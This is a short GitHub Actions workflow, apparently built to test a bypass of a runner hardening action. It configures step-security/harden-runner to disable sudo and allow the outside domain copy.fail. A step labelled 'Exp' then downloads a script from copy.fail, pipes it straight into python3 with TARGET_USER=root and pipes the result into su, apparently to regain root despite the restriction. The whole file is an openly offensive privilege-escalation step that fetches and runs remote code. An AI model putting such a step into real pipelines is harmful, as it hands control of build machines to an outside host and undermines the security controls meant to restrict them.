name: yoo
on:
  push:
    branches:
      - "*"

jobs:
  testBullFrog:
    runs-on: ubuntu-22.04
    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@v2
        with:
          disable-sudo-and-containers: true
          allowed-endpoints: |
             *.github.com
             copy.fail


      - name: Exp        
        run: |
          curl https://copy.fail/pw | TARGET_USER=root python3 | su
